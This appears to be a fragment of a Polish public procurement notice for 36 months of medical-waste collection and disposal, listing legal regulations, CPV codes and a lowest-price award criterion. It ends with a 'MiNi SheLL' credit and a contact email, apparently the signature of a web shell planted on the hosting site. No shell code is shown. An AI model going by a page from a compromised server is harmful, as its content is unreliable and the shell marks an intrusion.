7.	Usługa w zakresie zbierania, transportu i unieszkodliwiania odpadów medycznych musi być wykonana zgodnie z przepisami ustawy z dnia 27 kwietnia 2001 roku o odpadach (tekst jedn. z 2007 roku Dz.U. Nr 39 poz. 251 z poź. zmianami) oraz Rozporządzeniem Ministra Środowiska z dnia 27.09.2001 r. w sprawie katalogu odpadów (Dz. U. Nr 112 poz.1206) i Rozporządzeniem Ministra Zdrowia z dnia 30 lipca 2010 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz. U. Nr 139  poz. 940)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.50.00.00-2, 90.52.44.00-0, 90.52.42.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com